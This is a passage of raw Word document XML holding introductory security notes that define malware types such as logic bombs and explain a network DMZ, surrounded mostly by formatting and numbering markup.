          <w:rFonts w:cs="Tahoma-Bold"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F71E90">
        <w:rPr>
          <w:rFonts w:cs="Tahoma-Bold"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Malware Types</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A36AA8" w:rsidRDefault="00A36AA8" w:rsidP="00A36AA8">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Tahoma"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F71E90">
        <w:rPr>
          <w:rFonts w:cs="Tahoma"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Viruses are not the only form of malicious software. Othe</w:t>
      </w:r>
      <w:r w:rsidR="00F71E90">
        <w:rPr>
          <w:rFonts w:cs="Tahoma"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">r forms include worms, Trojans, </w:t>
      </w:r>
      <w:r w:rsidRPr="00F71E90">
        <w:rPr>
          <w:rFonts w:cs="Tahoma"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>zombies, logic bombs, and hoaxes. Each of these has its own characteristics.</w:t>
      </w:r>
      <w:r w:rsidR="00F06CC2">
        <w:rPr>
          <w:rFonts w:cs="Tahoma"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F06CC2" w:rsidRDefault="00BE0ABF" w:rsidP="00F06CC2">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Tahoma"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE0ABF">
        <w:rPr>
          <w:rFonts w:cs="Tahoma"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Virus and </w:t>
      </w:r>
      <w:r w:rsidR="00F06CC2" w:rsidRPr="00BE0ABF">
        <w:rPr>
          <w:rFonts w:cs="Tahoma"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Trojan payloads may contain logic bombs and data diddlers.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00641AFA" w:rsidRDefault="00641AFA" w:rsidP="00F06CC2">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Tahoma"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00641AFA" w:rsidRPr="00D3718F" w:rsidRDefault="00641AFA" w:rsidP="00641AFA">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Tahoma-Bold"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D3718F">
        <w:rPr>
          <w:rFonts w:cs="Tahoma-Bold"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Logic Bombs</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00641AFA" w:rsidRDefault="00641AFA" w:rsidP="00010AEC">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Tahoma"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D3718F">
        <w:rPr>
          <w:rFonts w:cs="Tahoma"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Logic bombs are software modules set up to run in a</w:t>
      </w:r>
      <w:r w:rsidR="00D3718F">
        <w:rPr>
          <w:rFonts w:cs="Tahoma"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> dormant state and to monitor a </w:t>
      </w:r>
      <w:r w:rsidRPr="00D3718F">
        <w:rPr>
          <w:rFonts w:cs="Tahoma"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>specific condition or set of conditions and to act</w:t>
      </w:r>
      <w:r w:rsidR="00D3718F">
        <w:rPr>
          <w:rFonts w:cs="Tahoma"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">ivate their payload under those </w:t>
      </w:r>
      <w:r w:rsidRPr="00D3718F">
        <w:rPr>
          <w:rFonts w:cs="Tahoma"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">conditions. A logic bomb is generally implanted in or </w:t>
      </w:r>
      <w:r w:rsidR="00D3718F">
        <w:rPr>
          <w:rFonts w:cs="Tahoma"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">coded as part of an application </w:t>
      </w:r>
      <w:r w:rsidRPr="00D3718F">
        <w:rPr>
          <w:rFonts w:cs="Tahoma"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>under development or maintenance.</w:t>
      </w:r>
      <w:r w:rsidR="00010AEC">
        <w:rPr>
          <w:rFonts w:cs="Tahoma"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00010AEC" w:rsidRPr="00010AEC">
        <w:rPr>
          <w:rFonts w:cs="Tahoma"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">It is difficult to implant a </w:t>
      </w:r>
      <w:r w:rsidR="00010AEC" w:rsidRPr="00010AEC">
        <w:rPr>
          <w:rFonts w:cs="Tahoma"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>logic bomb after the fact.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B0BE3" w:rsidRDefault="003B0BE3" w:rsidP="00010AEC">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Tahoma"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B0BE3" w:rsidRPr="002F4D7C" w:rsidRDefault="003B0BE3" w:rsidP="003B0BE3">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Tahoma"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002F4D7C">
        <w:rPr>
          <w:rFonts w:cs="Tahoma"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>DMZ</w:t>
      </w:r>
      <w:r w:rsidRPr="002F4D7C">
        <w:rPr>
          <w:rFonts w:cs="Tahoma"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (demilitarized network zone)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C803B3" w:rsidRPr="002F4D7C" w:rsidRDefault="003B0BE3" w:rsidP="00C803B3">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Tahoma"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002F4D7C">
        <w:rPr>
          <w:rFonts w:cs="Tahoma"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>A demilitarized zone (DMZ), also known as a screened su</w:t>
      </w:r>
      <w:r w:rsidR="002F4D7C">
        <w:rPr>
          <w:rFonts w:cs="Tahoma"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">bnet, allows an organization to </w:t>
      </w:r>
      <w:r w:rsidRPr="002F4D7C">
        <w:rPr>
          <w:rFonts w:cs="Tahoma"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>give external hosts limited access to public resour</w:t>
      </w:r>
      <w:r w:rsidR="002F4D7C">
        <w:rPr>
          <w:rFonts w:cs="Tahoma"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">ces, such as a company website, </w:t>
      </w:r>
      <w:r w:rsidRPr="002F4D7C">
        <w:rPr>
          <w:rFonts w:cs="Tahoma"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>without granting them access to the internal network.</w:t>
      </w:r>
      <w:r w:rsidRPr="002F4D7C">
        <w:rPr>
          <w:rFonts w:cs="Tahoma"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C803B3" w:rsidRPr="002F4D7C">
        <w:rPr>
          <w:rFonts w:cs="Tahoma"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002F4D7C">
        <w:rPr>
          <w:rFonts w:cs="Tahoma"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Typically, the DMZ </w:t>
      </w:r>
      <w:r w:rsidR="00C803B3" w:rsidRPr="002F4D7C">
        <w:rPr>
          <w:rFonts w:cs="Tahoma"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>is an isolated subnet attached to a firewall (when the</w:t>
      </w:r>
      <w:r w:rsidR="002F4D7C">
        <w:rPr>
          <w:rFonts w:cs="Tahoma"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> firewall has three interfaces— </w:t>
      </w:r>
      <w:r w:rsidR="00C803B3" w:rsidRPr="002F4D7C">
        <w:rPr>
          <w:rFonts w:cs="Tahoma"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">internal, external, and DMZ—this configuration is </w:t>
      </w:r>
      <w:r w:rsidR="002F4D7C">
        <w:rPr>
          <w:rFonts w:cs="Tahoma"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">sometimes called a three-legged </w:t>
      </w:r>
      <w:r w:rsidR="00C803B3" w:rsidRPr="002F4D7C">
        <w:rPr>
          <w:rFonts w:cs="Tahoma"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>firewall).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C803B3" w:rsidRPr="002F4D7C" w:rsidRDefault="00C803B3" w:rsidP="003B0BE3">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Tahoma"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B0BE3" w:rsidRPr="002F4D7C" w:rsidRDefault="004A5366" w:rsidP="003B0BE3">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Tahoma"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Tahoma"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">It will host publicly </w:t>
      </w:r>
      <w:r w:rsidR="003B0BE3" w:rsidRPr="002F4D7C">
        <w:rPr>
          <w:rFonts w:cs="Tahoma"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>available resources that must support unauthenticated connectio</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Tahoma"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">ns from just about any </w:t>
      </w:r>
      <w:r w:rsidR="003B0BE3" w:rsidRPr="002F4D7C">
        <w:rPr>
          <w:rFonts w:cs="Tahoma"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>source, such as DNS servers and email servers.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002F4D7C" w:rsidRPr="00010AEC" w:rsidRDefault="002F4D7C" w:rsidP="003B0BE3">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1AFE2942" wp14:editId="6EF24447">
            <wp:extent cx="5943600" cy="3197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97860"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="002F4D7C" w:rsidRPr="00010AEC">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99C" w:rsidRDefault="0026699C" w:rsidP="00E3694E">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="0026699C" w:rsidRDefault="0026699C" w:rsidP="00E36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oppins">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ahoma-Bold">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99C" w:rsidRDefault="0026699C" w:rsidP="00E3694E">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="0026699C" w:rsidRDefault="0026699C" w:rsidP="00E369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7962307"/>
      <w:docPartObj>
        <w:docPartGallery w:val="Page Numbers (Top of Page)"/>
        <w:docPartUnique/>
      </w:docPartObj>
    </w:sdtPr>
    <w:sdtEndPr>
      <w:rPr>
        <w:color w:val="7F7F7F" w:themeColor="background1" w:themeShade="7F"/>
        <w:spacing w:val="60"/>
      </w:rPr>
    </w:sdtEndPr>
    <w:sdtContent>
      <w:p w:rsidR="00E3694E" w:rsidRDefault="00E3694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4051C8" w:rsidRPr="004051C8">
          <w:rPr>
            <w:b/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t>16</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:b/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:b/>
            <w:bCs/>
          </w:rPr>
          <w:t xml:space="preserve"> | </w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:color w:val="7F7F7F" w:themeColor="background1" w:themeShade="7F"/>
            <w:spacing w:val="60"/>
          </w:rPr>
          <w:t>Page</w:t>
        </w:r>
      </w:p>
    </w:sdtContent>
  </w:sdt>
  <w:p w:rsidR="00E3694E" w:rsidRDefault="00E369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03688"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="38825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57408"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="AB26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60DA2"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="520A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96527"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="99A03192"/>
    <w:lvl w:ilvl="0" w:tplc="3DB4A2BC">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="-"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Calibri"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4681DA5"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="11AEA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9363F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7F3EF476"/>
    <w:lvl w:ilvl="0" w:tplc="3DB4A2BC">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="-"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="minorEastAsia"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EA5A20"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="986C1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C16CE1"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6074DCF8"/>
    <w:lvl w:ilvl="0" w:tplc="04090003">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1800" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"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51263CE"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="447825C6"/>
    <w:lvl w:ilvl="0" w:tplc="3DB4A2BC">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="-"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Calibri"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816150C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="8B62C0F4"/>
    <w:lvl w:ilvl="0" w:tplc="3DB4A2BC">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="-"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="780" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Calibri"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2EBF067D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3E443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371A64"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="752210BA"/>
    <w:lvl w:ilvl="0" w:tplc="3DB4A2BC">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="-"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1080" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="minorEastAsia"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B146F6"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2AE4F7B8"/>
    <w:lvl w:ilvl="0" w:tplc="3DB4A2BC">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="-"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Calibri"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25E0BD1"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="DBD64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8571BA"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7D2C97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9D150E3"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A6FA52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6A71A2"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="60E4745C"/>
    <w:lvl w:ilvl="0" w:tplc="3DB4A2BC">
      <w:start w:val="1"/>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715731"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9C4A29DC"/>
    <w:lvl w:ilvl="0" w:tplc="3DB4A2BC">
      <w:start w:val="1"/>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7359CC"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="45CCF6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FC2C2E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="40A6AE54"/>
    <w:lvl w:ilvl="0" w:tplc="3DB4A2BC">
      <w:start w:val="1"/>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FE127F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6E261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AE625C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7F9CE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036ABD"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="329CE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DE3B72"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5E0C5A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FF52A1E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="DC0A072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2"/>
  </w:num>
  <w:num w:numId="2">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="3">
    <w:abstractNumId w:val="20"/>
  </w:num>
  <w:num w:numId="4">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="5">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="6">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="7">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="8">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="9">
    <w:abstractNumId w:val="23"/>
  </w:num>
  <w:num w:numId="10">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="11">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="12">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="13">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="14">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="15">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="16">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="17">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="18">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="19">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="20">
    <w:abstractNumId w:val="24"/>
  </w:num>
  <w:num w:numId="21">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="22">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="23">
    <w:abstractNumId w:val="21"/>
  </w:num>
  <w:num w:numId="24">
    <w:abstractNumId w:val="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C16"/>
    <w:rsid w:val="00010AEC"/>
    <w:rsid w:val="000300B0"/>
    <w:rsid w:val="00052223"/>
    <w:rsid w:val="0005226A"/>
    <w:rsid w:val="00063A32"/>
    <w:rsid w:val="00077055"/>
    <w:rsid w:val="0008613F"/>
    <w:rsid w:val="00095902"/>
    <w:rsid w:val="000A099F"/>
    <w:rsid w:val="000B652A"/>
    <w:rsid w:val="000C4CEA"/>
    <w:rsid w:val="000E2A1F"/>
    <w:rsid w:val="000F453C"/>
    <w:rsid w:val="00142C26"/>
    <w:rsid w:val="001464E0"/>
    <w:rsid w:val="00172F14"/>
    <w:rsid w:val="00173DF3"/>
    <w:rsid w:val="001964B0"/>
    <w:rsid w:val="001A4179"/>
    <w:rsid w:val="001D1C16"/>
    <w:rsid w:val="001E59E8"/>
    <w:rsid w:val="002111AF"/>
    <w:rsid w:val="00212515"/>
    <w:rsid w:val="00214721"/>
    <w:rsid w:val="00244922"/>
    <w:rsid w:val="002668F0"/>
    <w:rsid w:val="0026699C"/>
    <w:rsid w:val="00267383"/>
    <w:rsid w:val="00286C58"/>
    <w:rsid w:val="002B71C4"/>
    <w:rsid w:val="002D20D2"/>
    <w:rsid w:val="002F11AD"/>
    <w:rsid w:val="002F4D7C"/>
    <w:rsid w:val="00314660"/>
    <w:rsid w:val="00314C8D"/>
    <w:rsid w:val="003228ED"/>
    <w:rsid w:val="00330270"/>
    <w:rsid w:val="00336086"/>
    <w:rsid w:val="00347D98"/>
    <w:rsid w:val="00350A43"/>
    <w:rsid w:val="00386EB9"/>
    <w:rsid w:val="00394660"/>
    <w:rsid w:val="003B0BE3"/>
    <w:rsid w:val="003C5B9F"/>
    <w:rsid w:val="003D61F5"/>
    <w:rsid w:val="003D6DB3"/>
    <w:rsid w:val="003E2F69"/>
    <w:rsid w:val="003E5AB0"/>
    <w:rsid w:val="00401E4C"/>
    <w:rsid w:val="004051C8"/>
    <w:rsid w:val="004131B1"/>
    <w:rsid w:val="00413D22"/>
    <w:rsid w:val="004244D7"/>
    <w:rsid w:val="0048619C"/>
    <w:rsid w:val="004A5366"/>
    <w:rsid w:val="004C2CE4"/>
    <w:rsid w:val="004D1B15"/>
    <w:rsid w:val="004F440D"/>
    <w:rsid w:val="004F6192"/>
    <w:rsid w:val="00500F90"/>
    <w:rsid w:val="00532178"/>
    <w:rsid w:val="00570051"/>
    <w:rsid w:val="00575155"/>
    <w:rsid w:val="00593903"/>
    <w:rsid w:val="005E6850"/>
    <w:rsid w:val="005F6612"/>
    <w:rsid w:val="00641AFA"/>
    <w:rsid w:val="00690854"/>
    <w:rsid w:val="006A46FA"/>
    <w:rsid w:val="006B6927"/>
    <w:rsid w:val="006C59BF"/>
    <w:rsid w:val="006D6104"/>
    <w:rsid w:val="006F4F49"/>
    <w:rsid w:val="00713ECD"/>
    <w:rsid w:val="007177C7"/>
    <w:rsid w:val="007850D9"/>
    <w:rsid w:val="0078571B"/>
    <w:rsid w:val="007A4080"/>
    <w:rsid w:val="007F5761"/>
    <w:rsid w:val="00821153"/>
    <w:rsid w:val="0082773C"/>
    <w:rsid w:val="008419AD"/>
    <w:rsid w:val="00852A8C"/>
    <w:rsid w:val="00872EF8"/>
    <w:rsid w:val="0087753C"/>
    <w:rsid w:val="008C75BB"/>
    <w:rsid w:val="008E0794"/>
    <w:rsid w:val="008E5CF2"/>
    <w:rsid w:val="00986BDA"/>
    <w:rsid w:val="009874C9"/>
    <w:rsid w:val="009B5C11"/>
    <w:rsid w:val="009D19F1"/>
    <w:rsid w:val="009D4D6C"/>
    <w:rsid w:val="009F15C3"/>
    <w:rsid w:val="00A14A12"/>
    <w:rsid w:val="00A3546F"/>
    <w:rsid w:val="00A36AA8"/>
    <w:rsid w:val="00A36E8F"/>
    <w:rsid w:val="00A846D5"/>
    <w:rsid w:val="00AC422F"/>
    <w:rsid w:val="00AC500F"/>
    <w:rsid w:val="00AE04E6"/>
    <w:rsid w:val="00AE334C"/>
    <w:rsid w:val="00AF1948"/>
    <w:rsid w:val="00B2441C"/>
    <w:rsid w:val="00B7213C"/>
    <w:rsid w:val="00B8087C"/>
    <w:rsid w:val="00BB394F"/>
    <w:rsid w:val="00BB6AC6"/>
    <w:rsid w:val="00BC5F65"/>
    <w:rsid w:val="00BE0ABF"/>
    <w:rsid w:val="00BF32E3"/>
    <w:rsid w:val="00C02ABC"/>
    <w:rsid w:val="00C2458F"/>
    <w:rsid w:val="00C5097C"/>
